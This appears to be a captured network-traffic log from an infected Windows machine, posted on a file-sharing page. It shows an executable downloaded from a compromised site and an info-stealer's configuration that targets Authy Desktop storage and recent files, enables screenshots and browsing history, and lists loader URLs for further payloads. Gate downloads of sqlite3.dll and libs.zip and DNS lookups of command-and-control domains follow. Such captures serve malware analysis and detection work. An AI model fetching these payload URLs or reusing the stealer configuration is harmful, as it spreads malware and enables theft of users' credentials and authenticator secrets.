zxcb
Date added: June 24, 2020 4:23 am
Added by: admin
File size: 17 MB
Downloads: 439
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1
GET /zxcv.EXE HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=90210-
Unless-Modified-Since: Sat, 20 Jun 2020 15:23:12 GMT
If-Range: "177000-5a8859680d070"
Host: jamshed.pk
Connection: Keep-Alive
2020-06-23 15:26:21.594726 IP 10.1.10.15.49724 > 64.31.23.18.80: Flags [.], ack 50, win 16363, length 0
2020-06-23 15:26:21.673543 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], ack 502, win 237, length 0
2020-06-23 15:26:21.726642 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], seq 1:1461, ack 502, win 237, length 1460: HTTP: HTTP/1.1 206 Partial Content
HTTP/1.1 206 Partial Content
Date: Tue, 23 Jun 2020 19:29:13 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Sat, 20 Jun 2020 15:23:12 GMT
ETag: "177000-5a8859680d070"
Accept-Ranges: bytes
Content-Length: 1445790
Content-Range: bytes 90210-1535999/1536000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
…%APPDATA%\\Microsoft\\Windows\\Recent","mask":"*","size_limit":500,"exceptions":"\\Windows\\\n\\Program Files\\\n\\Program Files (x86)\\\n\\AppData\\Local\\\n\\AppData\\LocalLow\\\n\\AppData\\Roaming\\\n\\ProgramData\\\n\\TEMP\\\n\\PUBLIC\\\n\\System32\\\n\\Keygen\\\n\\Crack\\\n\\Patch\\\n\\Games\\\n\\Game\\\n\\Music\\\n\\Movies\\\n\\Mp3\\\n\\Adobe\\\n\\xampp\\\n\\SteamGames\\\n\\steamapps\\","shortcuts":["true"]},{"name":"Authy","path":"%userprofile%\\AppData\\Roaming\\Authy Desktop\\Local Storage\\leveldb","size_limit":2000,"subfolders":["true"],"mask":"*"}],"loader_urls":null},"lu":[{"u":"http://tunnabelly.ug/nw.exe","t":0},{"u":"http://tunnabelly.ug/ac.exe","t":0},{"u":"http://tunnabelly.ug/ds1.exe","t":0},{"u":"http://tunnabelly.ug/ds2.exe","t":0}],"rm":1,"is_screen_enabled":1,"is_history_enabled":1,"depth":3}
2020-06-23 15:26:37.126576 IP 10.1.10.15.49745 > 34.105.129.68.80: Flags [P.], seq 1:269, ack 1, win 16685, length 268: HTTP: GET /gate/sqlite3.dll HTTP/1.1
GET /gate/sqlite3.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.105.129.68
Connection: Keep-Alive
2020-06-23 15:26:37.217333 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], ack 269, win 509, length 0
2020-06-23 15:26:37.241515 IP 10.1.10.15.49744 > 34.105.129.68.80: Flags [.], ack 2254, win 16683, length 0
2020-06-23 15:26:37.284456 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], seq 1:1421, ack 269, win 509, length 1420: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 23 Jun 2020 19:29:28 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT
ETag: "5c8ff6ea-dfcff"
Accept-Ranges: bytes
MZ … !This program cannot be run in DOS mode.
FCFJDEFHEOCNDHCNENEBEMFHEBFCEFBM
2020-06-23 15:26:42.537156 IP 10.1.10.15.49745 > 34.105.129.68.80: Flags [P.], seq 269:534, ack 917003, win 65320, length 265: HTTP: GET /gate/libs.zip HTTP/1.1
GET /gate/libs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 34.105.129.68
Connection: Keep-Alive
2020-06-23 15:26:42.629434 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], ack 534, win 507, length 0
2020-06-23 15:26:42.698331 IP 34.105.129.68.80 > 10.1.10.15.49745: Flags [.], seq 917003:918423, ack 534, win 507, length 1420: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 23 Jun 2020 19:29:34 GMT
Content-Type: application/zip
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Wed, 03 Apr 2019 07:47:18 GMT
ETag: "5ca46506-2b281b"
2020-06-23 15:26:56.819403 IP 10.1.10.15.61623 > 75.75.75.75.53: 32813+ A? tunnabelly.ug. (31)
2020-06-23 15:26:57.044841 IP 75.75.75.75.53 > 10.1.10.15.61623: 32813 1/0/0 A 217.8.117.45 (47)
2020-06-23 15:26:57.045514 IP 10.1.10.15.62114 > 75.75.75.75.53: 57616+ AAAA? tunnabelly.ug. (31)
2020-06-23 15:26:57.286870 IP 75.75.75.75.53 > 10.1.10.15.62114: 57616 0/1/0 (91)
tunnabelly.ug … a.dnspod.com … domainadmin
2020-06-23 15:27:07.278977 IP 10.1.10.15.54896 > 75.75.75.75.53: 54842+ A? thompson.ug. (29)
2020-06-23 15:27:07.514741 IP 75.75.75.75.53 > 10.1.10.15.54896: 54842 1/0/0 A 194.5.97.49 (45)
2020-06-23 15:28:23.855105 IP 10.1.10.15.53544 > 75.75.75.75.53: 51196+ A? vbchjfssdfcxbcver.ru. (38)
2020-06-23 15:28:23.949102 IP 75.75.75.75.53 > 10.1.10.15.53544: 51196 NXDomain 0/1/0 (99)
vbchjfssdfcxbcver.ru … a.dns.ripn.net. hostmaster